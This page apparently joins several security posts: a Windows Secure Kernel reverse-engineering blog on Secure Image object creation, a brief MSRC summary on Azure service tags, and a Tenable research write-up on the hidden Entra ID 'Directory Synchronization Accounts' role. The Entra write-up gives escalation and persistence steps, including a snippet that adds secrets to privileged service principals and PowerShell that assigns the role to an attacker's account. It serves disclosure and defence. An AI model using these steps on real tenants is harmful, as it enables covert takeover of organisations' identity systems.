However, although this looks to be the “base image”, based on the alignment of Mdl->StartVa we can quickly see from ByteCount that only the first 0x1000 bytes of this memory allocation are accessible via this MDL. The ByteCount of an MDL denotes the size of the range being described by the MDL. Usually the first 0x1000 bytes of an image are reserved for all of the headers (IMAGE_DOS_HEADER, IMAGE_FILE_HEADER, etc.). If we recall the original call stack (provided below for completeness), we can see that the NT function nt!SeValidateImageHeader is responsible for redirecting execution to ci.dll (which eventually results in the Secure System Call). This means in reality, although StartVa is aligned to look like a base address, we are really just dealing with the headers of the target image at this point. The actual base address is not relevant to us - only the headers are.

As a point of contention before we move on, we can do basic retroactive analysis based on the call stack to see that the image has only been mapped into memory. It has not been fully loaded - only the initial section object that backs the image is present in virtual memory. As we do more analysis in this post, we will also verify this with actual data showing that many of the default values in the headers, from disk, haven’t been fixed up (which normally happens when the image is fully loaded).

Great! Now that we know this first parameter is an MDL that contains the image headers, the next thing that needs to happen is for securekernel.exe to figure out how to safely access the contents of the region described by the MDL (the headers).

The first thing that VTL 1 does is take the MDL we just showed, provided by VTL 0, and create a new MDL in VTL 1 that describes the provided VTL 0 MDL. In other words, the new MDL will be laid out as follows.

Vtl1CopyOfVtl0Mdl->StartVa = page_aligned_address_mdl_starts_in;
Vtl1CopyOfVtl0Mdl->ByteOffset = offset_from_page_aligned_address_to_actual_address;

MDLs usually work with a page-aligned address as the base, with any remainder in ByteOffset. This is why the VTL 0 MDL’s address is first page-aligned (Vtl0Mdl & 0xFFFFFFFFFFFFF000), and the offset to the MDL within the page is set in ByteOffset.

Additionally, from the previous image, we can now realize what the page frame number in our Secure System Call parameters is used for: it is the PFN which corresponds to the VTL 0 MDL (the parameter PfnOfVtl0Mdl). We can validate this in WinDbg.

We know that a physical memory address is simply (page frame number * PAGE_SIZE) + any offset. Although we can see in the previous screenshot that the contents of memory for the page-aligned address of the MDL and the physical memory correspond, if we add the page offset (0x250 in this case) we can see there is no doubt this is the PFN for the VTL 0 MDL. We can additionally see that the PFNs align for the PTE of the VTL 0 MDL!

This MDL, after construction, has its StartVa mapped into VTL 1. At this point, for all intents and purposes, vtl1MdlThatDescribesVtl0Mdl->MappedSystemVa contains the VTL 1 mapping of the VTL 0 MDL! All integrity checks are then performed on this mapping.

VTL 1 has now mapped the VTL 0 MDL (using another MDL). MappedSystemVa is now a pointer to the VTL 1 mapping of the VTL 0 MDL, and the integrity checks occur on this new mapping instead of directly operating on the VTL 0 MDL. After confirming the VTL 0 MDL contains legitimate data (the large if statement in the screenshot below), another MDL (not the MDL from VTL 0, not the MDL created by VTL 1 to describe the MDL from VTL 0, but a third, new MDL) is created. This MDL will be an actual copy of the now-verified contents of the VTL 0 MDL. In other words, thirdNewMdl->StartVa = StartAddressOfHeaders (which is the start of the image we are dealing with in the first place to create a securekernel!_SECURE_IMAGE structure).

We can now clearly see why the page frame number (PFN) of the VTL 0 MDL was provided: a mapping of virtual memory is simply another virtual page backed by a common physical page. When the new MDL is mapped, the Secure Kernel can then use NewMdl->MappedSystemVa to safely access, in the Secure Kernel virtual address space, the header information provided by the MDL from VTL 0.

The VTL 1 MDL is now mapped into VTL 1 and has had all of its contents verified. We now return back to the original caller where we started in the first place - securekernel!SkmmCreateSecureImageSection. This leaves VTL 1 with a memory buffer containing the contents of the image from VTL 0. We can clearly see below that this is immediately used in a call to RtlImageNtHeaderEx in order to validate that the memory which VTL 0 sent in the first place contains a legitimate image, so that a securekernel!_SECURE_IMAGE object can be created. It is also at this point that we determine whether we are dealing with a 32-bit or 64-bit image.

More information is then gathered, such as the size of the optional headers, the section alignment, etc. Once this information is fleshed out, a call to an external function, SkciCreateSecureImage, is made. Based on the naming convention, we can infer this function resides in skci.dll.

We know from the original Secure System Call that the second parameter is the PFN which backs the VTL 0 MDL. UnknownUlong and UnknownUlong1 here are the 4th and 5th parameters, respectively, passed to securekernel!SkmmCreateSecureImageSection. As of right now we don’t know what they are. The last value, I noticed, was consistently the 0x800C constant across multiple calls to securekernel!SkmmCreateSecureImageSection.

Opening skci.dll in IDA, we can examine this function further, which seemingly is responsible for creating the secure image.

Taking a look into this function a bit more, we can see it doesn’t create the object itself; instead it creates a “Secure Image Context”, which on this build of Windows is 0x110 bytes in size. The first function called in skci!SkciCreateSecureImage is skci!HashKGetHashLength. This is a very simple function which accepts two parameters - one input and one output. The input parameter is our last Secure System Call parameter, which was 0x800C.

Although IDA’s decompilation here is a bit confusing, what this function does is look for a few constant values - one of the options being 0x800C. If the value 0x800C is provided, the output parameter (which is the hash size, based on the function name and the fact that the actual return value is of type NTSTATUS) is set to 0x20. Since 0x800C is obviously not a 0x20-byte value, nor a hash, 0x800C must instead refer to a type of hash associated with the image. We can then essentially say that the last Secure System Call parameter for Secure Image creation is the “type” of hash associated with this image. In fact, looking at cross-references to this function reveals that skci!CiInitializeCatalogs passes skci!g_CiMinimumHashAlgorithm as the first parameter to this function - meaning that the first parameter specifies the hash algorithm.
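
This behavior lines up with the documented CALG_* algorithm identifiers (CALG_SHA_256 is 0x800C, and a SHA-256 digest is 0x20 bytes). Below is a sketch of the mapping as described, not the decompiled code; the function name is invented:

#include <stdint.h>

/* Map a CALG_* algorithm identifier to its digest size in bytes. */
static int HashLengthForAlgorithm(uint32_t AlgId)
{
    switch (AlgId) {
    case 0x8004: return 0x14; /* CALG_SHA1    -> 20-byte digest */
    case 0x800C: return 0x20; /* CALG_SHA_256 -> 32-byte digest */
    case 0x800D: return 0x30; /* CALG_SHA_384 -> 48-byte digest */
    case 0x800E: return 0x40; /* CALG_SHA_512 -> 64-byte digest */
    default:     return -1;   /* unsupported algorithm */
    }
}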

After calculating the hash size, the Secure Image Context is then built out. This starts by obtaining the image headers (nt!_IMAGE_NT_HEADERS64) for the image. Then the Secure Image Context is allocated from the pool and initialized to 0 (this is how we know the Secure Image Context is 0x110 bytes in size). The various sections contained in the image are used to build out much of the information tracked by the Secure Image Context.

Note that UnknownUlong1 was updated to ImageSize. I wish I had a better way to explain how I identified this, but in reality it was happenstance: as I was examining the optional headers, I realized I had seen this value before. See the image below to validate that the value from the Secure System Call arguments corresponds to SizeOfImage.

One thing to keep in mind here is that a SECURE_IMAGE object is created before ntoskrnl.exe has had a chance to actually perform the full loading of the image. At this point the image is mapped into virtual memory, but not loaded. We can see this by examining the nt!_IMAGE_NT_HEADERS64 structure: ImageBase in the nt!_IMAGE_OPTIONAL_HEADER64 structure is still set to the generic 0x1c0000000 address instead of the virtual address at which the image is currently mapped (because this information has not yet been updated as part of the loading process).

Next in the Secure Image Context creation functionality, the Secure Kernel locates the .rsrc section of the image and the Resource Data Directory. This information is used to calculate the file offset to the Resource Data Directory and also captures the virtual size of the .rsrc section.

After this, skci!SkciCreateSecureImage will, if the parameter we previously identified as UnknownBool is set to true, allocate some pool memory which will be used in a call to skci!CiCreateVerificationContextForImageGeneratedPageHashes. This tells us the “unknown bool” is really an indicator of whether or not to create the Verification Context. A context, in this instance, refers to some memory (usually in the form of a structure) which contains information related to the context in which something was created - information that wouldn’t otherwise be available later.

The reader should know - I asked Andrea a question about this. The answer is that a file can be either page-hash signed or file-hash signed. Although the bool gates creating the Verification Context, it is more aptly described as indicating whether a file is file-hashed or page-hashed. If the image is file-hash signed, the Verification Context is created. For page-hashed files there is no need for the additional context information (we will see why shortly).

This begs the question - how do we know if we are dealing with a file that was page-hash signed or file-hash signed? Taking a short detour, this starts in the initial section object creation (nt!MiCreateNewSection). During this time a bitmask is formed, based on the parameters surrounding the creation of the section object that will back the loaded driver. A partially-reversed CREATE_SECTION_PACKET structure from my friend Johnny Shaw outlines this: Packet->Flags is one of the main factors that dictates how this new bitmask is formulated. In the case of the analysis being done in this blog post, when bit 21 (PacketFlags & 0x100000) and bit 6 (PacketFlags & 0x20) are set, we get the value for our new mask - 0x40000001. This bitmask is then carried through to the header validation functions, as seen below.

This bitmask finally makes its way to ci!CiGetActionsForImage. This call, as the name infers, returns another bitmask based on our 0x40000001 value. The caller of ci!CiGetActionsForImage is ci!CiValidateImageHeader, and the returned bitmask gives instructions to the header validation function as to what validation actions to take.

As previous art shows, depending on the bitmask returned, the header validation is done via either page hash validation or file hash validation, by supplying a function pointer to the appropriate validation function.

The two terms (page-hash signed and file-hash signed) can be very confusing - and there is very little information about them in the wild. A file-hashed file is one that has the entire contents of the file hashed. However, we must consider things like a driver being paged out and paged back in. When an image page is paged in, for instance, it needs to be validated. Images in this case are always verified using page hashes, never file hashes (I want to make clear I only know the following information because I asked Andrea). Because a file-hashed file would not have page hash information available (obviously, since it is “file-hashed”), skci.dll will create something called a “Page Hash Context” (which we will see shortly) for file-hashed images so that they are compatible with the requirement to verify information using page hashes.

As a point of contention, this means we have determined the arguments used for a Secure Image Secure System Call.

typedef struct _SECURE_IMAGE_CREATE_ARGS
{
    PVOID Reserved;
    PVOID Vtl0MdlImageHeaders;
    PVOID PageFrameNumberForMdl;
    bool ImageIsFileHashedCreateVerificationContext;
    ULONG ImageSize;
    ULONG HashAlgorithm;
} SECURE_IMAGE_CREATE_ARGS;

Moving on, the first thing this function does (since we are dealing with a file-hashed image) is call two functions which are responsible for creating additional contexts - the first creates an “Image Hash Context” and the second a “Page Hash Context”. These contexts are stored in the main Verification Context.

skci!CiCreateImageHashContext is a relatively small wrapper that simply takes the hashing algorithm passed in as part of the Secure Image Secure System Call (0x800C in our case) and uses this in a call to skci!SymCryptSha256Init. skci!SymCryptSha256Init takes the hash algorithm (0x800C) and uses it to create the Image Hash Context for our image (which really isn’t so much a “context” as it mainly just contains the size of the hash and the hashing data itself).

The Page Hash Context information is only produced for a file-hashed image; otherwise, file-hashed images would have no way to be verified in the future, as only page hashes are used for verification of the image. Page Hash Contexts are slightly more involved, but provide much of the same information. skci!CiCreatePageHashContextForImageMapping is responsible for creating this context, and VerificationContext_Offset_0x108 stores the actual Page Hash Context.

The Page Hash Context logic begins by using SizeOfRawData from each of the section headers (IMAGE_SECTION_HEADER) to iterate over the sections available in the image being processed and to capture how many pages make up each section (and, in turn, how many pages make up all of the sections of the image).

This information, along with IMAGE_OPTIONAL_HEADER->SizeOfHeaders, the size of the image itself, and the number of pages that span the sections of the image, is stored in the Page Hash Context. The Page Hash Context is allocated based on the size of the sections (to ensure enough room is present to store all of the needed information).

After this, the Page Hash Context information is filled out. This begins by storing only the first page of the image in the Page Hash Context. The rest of the pages in each of the sections of the target image are filled out via skci!SkciValidateImageData, which is triggered by a separate Secure System Call. This comes at a later stage, after the current Secure System Call has returned but before we have left the original nt!MiCreateNewSection function. We will see this in a future blog post.

Now that the initial Verification Context (which also contains the Page Hash and Image Hash Contexts) has been created (though, as we know, it will be updated with more information later), skci!SkciCreateSecureImage will sort and copy information from the image section headers and store it in the Verification Context. This function will also calculate the file offset for the last section in the image by computing PointerToRawData + SizeOfRawData in the skci!CiGetFileOffsetAfterLastRawSectionData function.

After this, the Secure Image Context creation work is almost done. The last thing this function does is compute the hash of the first page of the image and store it, this time directly in the Secure Image Context. The Secure Image Context is then returned to the caller of skci!SkciCreateSecureImage, which is the Secure Kernel function servicing the original Secure System Call.

Note that previously we saw skci!CiAddPagesToPageHashContext called within skci!CiCreatePageHashContextForImageMapping. In the call in the above image, the fourth parameter is SizeOfHeaders, but in the call within skci!CiCreatePageHashContextForImageMapping the parameter was MdlByteCount - the ByteCount provided earlier by the MDL in the Secure System Call arguments. In our case, SizeOfHeaders and the ByteCount are both 0x1000 - which implies that when the MDL is constructed, the ByteCount is set to 0x1000 based on the SizeOfHeaders from the optional header. This validates what we mentioned at the beginning of the blog: although the “base address” is used as the first Secure System Call parameter, it could more accurately be referred to as the “headers” of the image.

The Secure Kernel maintains a table of all active Secure Images that are known. There are two very similar tables, which are used to track threads and NARs (securekernel!SkiThreadTable and securekernel!SkiNarTable). These are “sparse tables”. A sparse table is a computer science concept that effectively works like a static array of data, but instead of being unordered, the data is kept ordered, which allows for faster lookups. It supports 0x10000000 (268,435,456) entries. Note that these entries are not all allocated at once; they are simply “reserved” in the sense that the entries not in use are not mapped.
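
The reserve-but-don't-commit idea can be illustrated with ordinary Win32 virtual memory calls. This is a user-mode analogy only (the Secure Kernel's actual implementation is its own), and the names are invented:

#include <windows.h>

#define SPARSE_CAPACITY 0x10000000ULL /* slots reserved, not committed */

/* Reserve address space for every possible slot; no physical memory yet. */
static void **SparseTableCreate(void)
{
    return (void **)VirtualAlloc(NULL, SPARSE_CAPACITY * sizeof(void *),
                                 MEM_RESERVE, PAGE_READWRITE);
}

/* Commit only the page holding this slot, then store the entry. Committing
   an already-committed page simply succeeds. */
static BOOL SparseTableSet(void **Table, SIZE_T Index, void *Entry)
{
    if (!VirtualAlloc(&Table[Index], sizeof(void *), MEM_COMMIT, PAGE_READWRITE))
        return FALSE;
    Table[Index] = Entry;
    return TRUE;
}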

Secure Images are tracked via the securekernel!SkmiImageTable symbol. This table, as a side note, is initialized when the Secure Kernel initializes. The Secure Pool, the Secure Image infrastructure, and the Code Integrity infrastructure are initialized after the kernel-mode user-shared data page is mapped into the Secure Kernel.

The Secure Kernel first allocates an entry in the table where the Secure Image object will be stored. To calculate the index where the object will be stored, securekernel!SkmmAllocateSparseTableEntry is called. This creates a sizeof(ULONG_PTR) “index” structure, which determines the index into the table where the object is stored. In the case of storing a new entry on 64-bit systems, the first 4 bytes provide the index and the last 4 bytes are unused (or, if they are used, I couldn’t see where). This is all done back in the original function, securekernel!SkmmCreateSecureImageSection, after the function which creates the Secure Image Context has returned.

As we can also see above, this is where our actual Secure Image object is created. As the functionality of securekernel!SkmmCreateSecureImageSection continues, this object will get filled out with more and more information. Some of the first data collected is whether the image is already loaded at a valid kernel address. Earlier in the blog we mentioned that Secure Image creation occurs when an image is first mapped but not yet loaded; this seems to imply it is possible for a Secure Image to already be loaded at a valid kernel-mode address. If it is loaded, a bitwise OR happens with a mask of 0x1000 to indicate this. The entry point of the image is captured, and the previously-allocated Secure Image Context data is saved. Also among the first information collected are the virtual address and size of the Load Config Data Directory.

The next steps determine if the image being loaded is characterized as a DLL (this is technically possible; for example, ci.dll is loaded into kernel-mode) by checking if the 13th bit is set in the FileHeader.Characteristics bitmask.

After this, the Secure Image creation logic will create an allocation based on the size of the image from NtHeaders->OptionalHeader->SizeOfImage. This allocation is not touched again during the initialization logic.

At this point, the prototype PTEs for the image are populated for each of the sections in the image (via securekernel!SkmiPopulateImagePrototypes). If you are not familiar: when a memory region is shared between, for example, two processes, an issue arises at the PTE level. A prototype PTE allows the memory manager to easily track pages that are shared between two processes. As Windows Internals, 7th Edition, Part 1, Chapter 5 states, prototype PTEs are created for a pagefile-backed section object when it is first created. The same thing is effectively happening here, except instead of actually creating the prototype PTEs (because this is done in VTL 0), the Secure Kernel simply obtains a pointer to them.

After this, additional section data and relocation information for the image is captured. This first starts by checking if the relocation information is stripped and, if the information hasn’t been stripped, the code captures the Image Data Directory associated with relocation information.

Next, each of the present sections is again iterated over. This is done to capture some important information about each section in a memory allocation that is stored in the Secure Image object; specifically, relocation information is being processed here. The Secure Image object creation logic will first allocate some memory in order to store the virtual address page number, the size of the raw data in pages, and the pointer to the raw data for the section header currently being processed. As part of each check, the logic determines if the relocation table falls within the range of the current section. If it does, the file offset to the relocation table is calculated and stored in the Secure Image object.

Additionally, we saw previously that if the relocation information was stripped out of the image, the Secure Image object (at offsets 0x50 and 0x58) was updated with the values false and true (0 and 1), respectively. In this case, however, if the relocation information wasn’t stripped but there legitimately was no relocation information available (the Image Data Directory entry for the relocation data was zero), these boolean values are updated to true and false (1 and 0), respectively. This seems to record in the Secure Image object why the relocation information may or may not be present.

The last bits of information the Secure Image object creation logic processes are:

  1. Is the image being processed a 64-bit executable image, or does it have at least 10 (decimal) data directories, so that the data directory we want to capture is present? If not, skip step 2.
  2. If the above is true, allocate and fill out the “Dynamic Relocation Data”.

As a side note, I only determined that the proper name for this data is “Dynamic Relocation Data” because of the routine securekernel!SkmiDeleteImage - which is responsible for deleting a Secure Image object when the object’s reference count reaches 0 (after we get through this last bit of processed information, we will talk about this routine in more detail). In the securekernel!SkmiDeleteImage logic, a few pointers in the object itself are checked to see if they are allocated. If they are, they are freed (this makes sense, as we have seen there have been many more memory allocations than just the object itself). SecureImageObject + 0xB8 is one such allocation checked in the Secure Image object. If the allocation is present, a function called securekernel!SkmiFreeDynamicRelocationInfo is called to presumably free this memory.

This would indicate that the “Dynamic Relocation Data” is being created in the Secure Image object creation logic.

The information captured here refers to the load config Image Data Directory. The information about the load config data is verified, and the virtual address and size are captured and stored in the Secure Image object. This makes sense, as the dynamic relocation table is located via the load config directory of an executable.

This is the last information the Secure Image object needs for its initialization (we know more information will be collected after this Secure System Call returns)! Up until this point, the only parameter we haven’t touched in the securekernel!SkmmCreateSecureImageSection function is the last one, which is actually an output parameter. The output parameter is filled with the result of a call to securekernel!SkobCreateHandle.

If we look back at the initial Secure System Call dispatch function, this output parameter will be stored in the original Secure System Call arguments at offset 0x10 (16 decimal).

This handle is also stored in the Secure Image object itself. This implies that when a Secure Image object is created, a handle to the object is returned to VTL 0/NT! This handle is eventually stored in the Control Area of the section object which backs the image in VTL 0, specifically in ControlArea->u2.e2.SeImageStub.StrongImageReference.

Note that the handle isn’t immediately stored in the Control Area of the section object. This happens later, as we will see in a subsequent blog post, but it is something to note here. As another point of contention, the way I knew this handle would eventually be stored there is because when I was previously doing analysis on NAR/NTE creation, which we will eventually talk about, this handle value was the first parameter passed as part of that Secure System Call.

This pretty much sums up the instantiation of the initial Secure Image object. The object is now created, but not finalized - much more data still needs to be validated. Because this further validation happens after the Secure System Call returns, I will put that analysis in another blog post, in which we will look at what ntoskrnl.exe, securekernel.exe, and skci.dll do with this object after the initial creation, before the image is actually fully loaded in VTL 0. Before we close this post, though, it is worth taking a look at the object itself and how it is treated by the Secure Kernel.

Secure Image Objects - Now What?

After the Secure Image object is created, the “clean-up” code at the end of the function (securekernel!SkmmCreateSecureImageSection) dereferences the object if it was created but a failure occurred during the setup of the initial object. Notice that the object is dereferenced at 0x20 bytes before the actual object address.

What does this mean? Objects are prepended with a header that contains metadata about the object itself. Historically on Windows, the reference count for an object is contained in the object header (for the normal kernel this is nt!_OBJECT_HEADER). This tells us that each object managed by the Secure Kernel has a 0x20-byte header! Taking a look at securekernel!SkobpDereferenceObject, we can clearly see that within this header the reference count itself is stored at offset 0x18. We can also see that there is an object destructor, contained in the header itself.
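
Putting the observed offsets together, a hypothetical layout of this header might look like the following. Only the 0x20-byte size, the reference count at offset 0x18, and the existence of a destructor pointer are observed; the field names and the destructor's exact position are my assumptions:

/* Hypothetical reconstruction of the Secure Kernel's 0x20-byte object header. */
typedef struct _SK_OBJECT_HEADER_SKETCH
{
    void *Unknown0;                   /* +0x00 - unknown */
    void *Unknown1;                   /* +0x08 - unknown */
    void (*Destructor)(void *Object); /* +0x10 - destructor (assumed position) */
    long long ReferenceCount;         /* +0x18 - observed in SkobpDereferenceObject */
} SK_OBJECT_HEADER_SKETCH;            /* sizeof == 0x20; the object body follows */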

Just like regular NT objects, there is a similar “OBJECT_TYPE” setup (nt!PsProcessType, nt!PsThreadType, etc.). Taking a look at the image below, securekernel!SkmiImageType is used when referring to Secure Image Objects.

Existing art denotes that this object type pointer (securekernel!SkmiImageType) contains the destructor and size of the object. The interested reader can corroborate this by opening securekernel.exe as data in WinDbg (windbgx -z C:\Windows\system32\securekernel.exe) and looking at the object type directly. This reveals that for the securekernel!SkmiImageType symbol there is an object destructor and, as we saw earlier with the value 0xc8, the size of this type of object.

The following is a list of most of the valid objects I located in the Secure Kernel (although it is unclear without further analysis what many of them are used for):

  1. Secure Image Objects (securekernel!SkmiImageType)
  2. Secure HAL DMA Enabler Objects (securekernel!SkhalpDmaEnablerType)
  3. Secure HAL DMA Mapping Objects (securekernel!SkhalpDmaMappingType)
  4. Secure Enclave Objects (securekernel!SkmiEnclaveType)
  5. Secure HAL Extension Objects (securekernel!SkhalExtensionType)
  6. Secure Allocation Objects (securekernel!SkmiSecureAllocationType)
  7. Secure Thread Objects (securekernel!SkeThreadType)
  8. Secure Shadow Synchronization Objects (events/semaphores) (securekernel!SkeShadowSyncObjectType)
  9. Secure Section Objects (securekernel!SkmiSectionType)
  10. Secure Process Objects (securekernel!SkpsProcessType)
  11. Secure Worker Factory Objects (securekernel!SkeWorkerFactoryObjectType)
  12. Secure PnP Device Objects (securekernel!SkPnpSecureDeviceObjectType)

Additional Resources

Truthfully, at the end of the analysis I did for this blog, I stumbled across these wonderful documents titled “Security Policy Document”. They are produced by Microsoft for FIPS (the Federal Information Processing Standard) and contain some additional insight into SKCI/CI. Additional documents on other Windows technologies can be found here.

Conclusion

I hope the reader found this blog to be at least somewhat interesting, even if it wasn’t new information for you. As always, if you have feedback please don’t hesitate to reach out to me. I would also like to thank Andrea Allievi for answering a few of my questions about this blog post! I did not ask Andrea to review every single aspect of this post, so any errors in it are completely mine. If, again, you identify issues, please reach out to me so I can make edits!

Peace, love, and positivity!

Improved Guidance for Azure Network Service Tags

Summary

Microsoft Security Response Center (MSRC) was notified in January 2024 by our industry partner, Tenable Inc., about the potential for cross-tenant access to web resources using the service tags feature. Microsoft acknowledged that Tenable provided a valuable contribution to the Azure community by highlighting that it can be easily misunderstood how to use service tags and their intended purpose.

Stealthy Persistence with “Directory Synchronization Accounts” Role in Entra ID

Summary

The “Directory Synchronization Accounts” Entra role is very powerful (allowing privilege escalation to the Global Administrator role) while being hidden in Azure portal and Entra admin center, in addition to being poorly documented, making it a perfect stealthy backdoor for persistence in Entra ID 🙈

This was discovered by Tenable Research while working on identity security.

“Directory Synchronization Accounts” role

Permissions inside Microsoft Entra ID (e.g. reset user password, change group membership, create applications, etc.) are granted through Entra roles. This article focuses on the “Directory Synchronization Accounts” role among the roughly 100 built-in Entra roles. This role has the ID “d29b2b05-8046-44ba-8758-1e26182fcf32”, it carries the PRIVILEGED label that was recently introduced, and its description is:

This is a privileged role. Do not use. This role is automatically assigned to the Microsoft Entra Connect service, and is not intended or supported for any other use.

A privileged role that one should not use? It sounds like an invitation to me! 😉

The documentation seems to say that this special role cannot be freely assigned:

This special built-in role can’t be granted outside of the Microsoft Entra Connect wizard

This is incorrect, since it can technically be assigned, even if it shouldn’t be (pull-request to fix this).

Privileged role

I confirm that the role is privileged because, of course, it contains some permissions marked as privileged, but also because it has implicit permissions in the private undocumented “Azure AD Synchronization” API (not to be confused with the public “Microsoft Entra Synchronization” API).

These permissions allow escalation up to the Global Administrator role using several methods that we will see later💥

Normal usage by Microsoft Entra Connect

The normal usage of this role is indeed to be assigned to the Entra service account used by “Entra Connect” (formerly “Azure AD Connect”), i.e. the user named “On-Premises Directory Synchronization Service Account” which has a UPN with this syntax: “SYNC_<name of the on-prem server where Entra Connect runs>_<random id>@tenant.example.net”.

Even though it is not documented (I’ve proposed a pull-request to fix this), this role is also assigned to the similar Entra service account used by “Entra Cloud Sync” (formerly “Azure AD Connect Cloud Sync”), i.e. the user also named “On-Premises Directory Synchronization Service Account”, but whose UPN is under the tenant’s default onmicrosoft.com domain instead.

This role grants the Entra service user the permissions it requires to perform its inter-directory provisioning duties, such as creating/updating hybrid Entra users from the on-premises AD users, updating their password in Entra when it changes in AD with Password Hash Sync enabled, etc.

Security defaults

Security defaults is a feature in Entra ID that activates multiple security features at once to increase security, notably requiring Multi-Factor Authentication (MFA). However, as documented by Microsoft and highlighted by Dr. Nestori Syynimaa @DrAzureAD, assignees of the “Directory Synchronization Accounts” role are excluded from security defaults!


Pro tip for threat actors: Create your persistent account as directory synchronization account. It has nice permissions and excluded from security defaults 🥷 Pro tip for admins: Purchase Azure AD premium and block all users with that role (excluding the real sync account) 🔥 https://t.co/tm7YZtSdQv pic.twitter.com/RUnvILwucE

Nestori also confirmed that the exclusion applies to everyone assigned to the role (I’ve proposed a pull-request to update the doc).

Once again, I understand the need for this since the legitimate accounts are user accounts, thus subject to MFA rules. However, this could be abused by a malicious administrator who wants to avoid MFA 😉

Hidden role

Here is the proof that this role is hidden in the Azure portal / Entra admin center. See this Entra Connect service account apparently having 1 role assigned:

But no results are shown in the “Assigned roles” menu (same in the other tabs, e.g. “Eligible assignments”) 🤔:

Actually, I tested it in several of my tenants and noticed that the role was displayed in one of them:

I suppose that the portal is running a different version of the code, perhaps behind a feature flag or A/B testing, because this tenant’s portal uses the MS Graph API (on graph.microsoft.com) to list the role assignments:

Whereas the other uses a private API (on api.azrbac.mspim.azure.com):

I noticed this difference last year when I initially reported this behavior to MSRC.

And what about the “Roles and administrators” menu? We should be able to see the “Directory Synchronization Accounts” built-in role there, shouldn’t we? Well, as you guessed, it’s hidden too 🙈 (in all my tenants; no difference here):

Note that, for those who prefer it, the observations are identical in the Entra admin center.

I understand that Microsoft decided to hide it since this is a technical role that isn’t meant to be assigned by customers. A handful of other similar roles are hidden too. However, from a security perspective, I find it dangerous because organizations cannot use the Microsoft portals to see who may have this privileged role assigned illegitimately 😨! I reported this concern to MSRC (reference VULN-083495) last year, who confirmed that it was not a security issue and that they created a feature request to eventually improve the UX to help customers understand it.

This is the reason why I consider that this privileged role is a stealthy persistence method for attackers who compromised an Entra tenant.

Abuse methods

We will see how the security principals (users, but also service principals!) assigned to the “Directory Synchronization Accounts” role can elevate their privileges to the Global Administrator role! 😎

Password reset

There are several articles online explaining that the Entra Connect (ex- Azure AD Connect) service account in Entra ID is allowed to reset user passwords. One example is the “Unnoticed sidekick: Getting access to cloud as an on-prem admin” article by Dr. Nestori Syynimaa where “Set-AADIntUserPassword” is used.

I suppose this is allowed by the “microsoft.directory/passwordHashSync/allProperties/allTasks” Entra permission of the role, but I cannot check for sure.

There are some limitations though:

  • Only hybrid accounts (synchronized from on-premises AD) can be targeted (which was only recently fixed)
  • Only if Password Hash Sync (PHS) is enabled; however, the role allows enabling it
  • Only via the private “Azure AD Synchronization” API, implemented in AADInternals, whose endpoint is https://adminwebservice.microsoftonline.com/provisioningservice.svc. It must not be confused with other similarly named APIs: the public Microsoft Entra Synchronization API or the private Azure AD Provisioning API. The reset must therefore be done using the Set-AADIntUserPassword AADInternals PowerShell cmdlet.
  • Not exploitable if the target has MFA or FIDO2 authentication enforced: the password can still be reset, but authentication won’t be possible

Add credentials to privileged application / service principal

The other interesting method was described by Fabian Bader in this article: “From on-prem to Global Admin without password reset”. I recommend that you read the original article but, in summary, the idea is to identify an application or service principal holding powerful Microsoft Graph API permissions, then abuse the “microsoft.directory/applications/credentials/update” or “microsoft.directory/servicePrincipals/credentials/update” Entra permissions, which the “Directory Synchronization Accounts” role holds, to add credentials to it. This allows the attacker to authenticate as the service principal and abuse the method corresponding to the dangerous Graph API permission to escalate to Global Admin.

This method was also described by Dirk-jan Mollema in this article: “Azure AD privilege escalation — Taking over default application permissions as Application Admin“.
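To illustrate the credential-injection step, here is a minimal sketch of my own (not taken from either article) using the documented Microsoft Graph addPassword action. The token and service principal object ID are placeholders, and it assumes the caller already holds the permissions granted by the role:

import requests

# Illustrative sketch only: add a client secret to a target service principal
# through the Microsoft Graph "addPassword" action. TOKEN and SP_ID are
# placeholders for this example.
TOKEN = "<Graph access token of a 'Directory Synchronization Accounts' assignee>"
SP_ID = "<object id of a service principal holding powerful Graph permissions>"

resp = requests.post(
    f"https://graph.microsoft.com/v1.0/servicePrincipals/{SP_ID}/addPassword",
    headers={"Authorization": f"Bearer {TOKEN}"},
    json={"passwordCredential": {"displayName": "demo"}},
)
resp.raise_for_status()
print(resp.json()["secretText"])  # the newly created secret, usable to sign in as the SP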

Manage role assignment

Since one cannot manage this role using the Azure portal or the Entra admin center, how can its assignees be listed or managed? We will see how, using the Microsoft Graph PowerShell SDK, since the Azure AD PowerShell module is now deprecated.

List role assignees

The Get-MgDirectoryRoleMember command lists the security principals assigned to a role. We reference the “Directory Synchronization Accounts” role by its well-known ID (seen at the beginning) instead of its name, for better reliability:

Connect-MgGraph -Scopes "Domain.Read.All"
$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
Get-MgDirectoryRoleMember -DirectoryRoleId $dirSync.Id | Format-List *

The output is not very consistent because role assignees are “security principals”, which can be users, groups, or service principals (undocumented 😉), i.e. different types of objects.

In this example I have specified the “Domain.Read.All” Graph API permission when connecting, because it is usually already delegated, but the least privileged permission is actually “RoleManagement.Read.Directory”.

Add role assignment

And how would an attacker wishing to abuse this role for stealthy persistence assign it? With the New-MgRoleManagementDirectoryRoleAssignment command:

Connect-MgGraph -Scopes "RoleManagement.ReadWrite.Directory"
$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
$hacker = Get-MgUser -UserId hacker@tenant.example.net
New-MgRoleManagementDirectoryRoleAssignment -RoleDefinitionId $dirSync.Id -PrincipalId $hacker.Id -DirectoryScopeId "/"

In this example, I have specified the “RoleManagement.ReadWrite.Directory” Graph API permission when connecting, which is the least privileged permission.

Also, if this role has never been used in the tenant (for example if Entra Connect / Entra Cloud Sync was never configured), the role instance must be created from the role template before usage, with this command:

New-MgDirectoryRole -RoleTemplateId "d29b2b05-8046-44ba-8758-1e26182fcf32"

Remove role assignment

A malicious role assignment, or one which is a leftover from when the Entra tenant was hybrid, can be removed with the Remove-MgDirectoryRoleMemberByRef command:

$dirSync = Get-MgDirectoryRole -Filter "RoleTemplateId eq 'd29b2b05-8046-44ba-8758-1e26182fcf32'"
Remove-MgDirectoryRoleMemberByRef -DirectoryRoleId $dirSync.Id -DirectoryObjectId <object ID of the assignee to remove>

Recommendations

➡️ As a conclusion, my recommendation is to list and monitor the security principals assigned to the “Directory Synchronization Accounts” role. Since you cannot use the Azure portal / Entra admin center to see those, you must use the Graph API (or the deprecated Azure AD PowerShell module) as described above. Thankfully, you will soon be able to list all role assignees from the comfort of Tenable One or Tenable Identity Exposure.

